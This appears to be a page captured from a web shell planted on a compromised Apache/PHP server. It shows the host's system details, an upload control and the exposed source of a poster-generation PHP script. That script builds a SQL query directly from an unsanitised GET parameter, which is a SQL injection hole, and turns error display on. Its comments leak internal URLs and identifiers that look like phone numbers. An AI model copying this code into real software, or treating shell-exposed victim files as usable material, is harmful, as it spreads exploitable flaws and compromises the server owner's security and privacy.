( ′∀`)σ≡σ☆))Д′)レ(゚∀゚;)ヘ=З=З=Зε≡(ノ´_ゝ`)ノ HEX
HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux mail.thebrand.ai 6.8.0-107-generic #107-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 13 19:51:50 UTC 2026 x86_64
User: www-data (33)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: /var/www/html/createMyPosterGraphics.php
<?php
/*http://localhost/thebrand/processFont2.php?route=theName&fontid=1597&myfont=&fontcatalogid=254722407698&themeid=1597&font_Username=BebasNeue.otf&font_Name=BebasNeue.otf&font_Url=BebasNeue.otf&font_Text=BebasNeue.otf&text_w=300&text_h=0&text_x=154&text_y=459&text_align=left&text_size=25&text_color=ffffff&url_color=ffffff&name_color=ffffff&username_color=ffffff&url_size=25&name_size=25&username_size=25&text_pad=0&text_line_height=30&text=santos%20okottah*/

include("includes/limittext.php");
include('Connections/videoondemand.php');
require("DbSql2.inc.php");
require("NewsSql2.inc.php");
$db = new NewsSQL();
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
/*
https://maps.googleapis.com/maps/api/staticmap?center=NAKURU&zoom=13&size=600x600&maptype=hybrid
http://localhost/mimix/brandX.php?AppNo=254722407698&mag=yes&gratitude=posted&filter=mood&nani=254722407699&cl=rightnow&pic=0fbfb36bad36a37e22955b2081eac3036SAMCOM2011DAY3-051.jpg*/

$mode=$_GET["mode"];
$themeid=$_GET["themeid"];
$font=$_GET["font"];
 
include("protect.php");




session_start();


global $link;
if (!empty($themeid))
{
    $sql ="SELECT * FROM `profilepicture` where id='$themeid' limit 0,1";
}



$query = mysqli_query($link,$sql) or die(mysql_error());

while($row=mysqli_fetch_array($query)) {

    $catalogid = $row["catalogid"];
    $title = $row["title"];
    $theme_id = $row["id"];
    $poster = $row["poster"];

}

include("includes/processFunctionsX.php");
 set_time_limit(0) ;


?>
 <table   width="50%"  border="0" style="float: left" >
  <tbody>
    <tr>
      <td><a href="https://www.thebrand.ai/superLayer/processCanvasV2.php?themeid=<?php echo $theme_id; ?>&poster=<?php echo $poster; ?>&snap=yes"><img style="float: left" width="100%" src="https://www.thebrand.ai/superLayer/processCanvasV2.php?themeid=<?php echo $theme_id; ?>&poster=<?php echo $poster; ?>&snap=yes" alt="logo"></a></td>
    </tr>

  </tbody>
</table>


 



?>